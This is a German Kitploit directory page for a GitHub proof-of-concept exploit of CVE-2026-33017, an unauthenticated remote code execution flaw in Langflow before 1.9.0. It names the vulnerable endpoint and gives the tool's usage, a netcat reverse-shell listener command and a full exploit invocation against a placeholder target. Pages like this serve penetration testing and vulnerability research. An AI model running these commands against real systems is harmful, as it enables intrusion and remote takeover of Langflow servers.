Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017-Langflow-RCE — CVE-2026-33017 Exploit | von infrar3d | Kitploit
Tools/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

CVE-2026-33017 Exploit | von infrar3d

Repository anzeigen
111vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017 - Langflow RCE-Schwachstelle

xpl0ited von infrar3d

Dieses Proof-of-Concept-Exploit zielt auf eine kritische Remote Code Execution (RCE)-Schwachstelle in Langflow-Versionen vor 1.9.0 ab. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Systembefehle auszuführen, indem sie bösartigen Python-Code über den Flow-Building-API-Endpunkt einschleusen. Die Schwachstelle existiert im Endpunkt /api/v1/build_public_tmp/{flow_id}/flow, der benutzergelieferten Code im Code-Feld von Komponentenvorlagen nicht ordnungsgemäß bereinigt.

Verwendung:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       Hilfe anzeigen und beenden
  -u, --url URL    Ziel-Basis-URL
  -f, --flow FLOW  Flow-ID
  -H, --host HOST  Listener-Host für Reverse Shell
  -P, --port PORT  Listener-Port (Standard: 4444)
                                         

Beispiel:

Das erste Terminal (Listener):

root@kitploit:~
nc -lvnp 4444

Das zweite Terminal (Exploit):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ Haftungsausschluss ⚠️

Diese Software und der Proof-of-Concept-Code werden ausschließlich für Bildungs- und Forschungszwecke bereitgestellt.

  • Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
  • Nicht gegen Systeme verwenden ohne ausdrückliche vorherige Genehmigung.
  • Die Verwendung dieser Werkzeuge zum Angriff auf Ziele ohne Einwilligung ist illegal.

Sie sind für die Einhaltung aller geltenden Gesetze verantwortlich. Ethisch und verantwortungsbewusst nutzen.

Tool herunterladen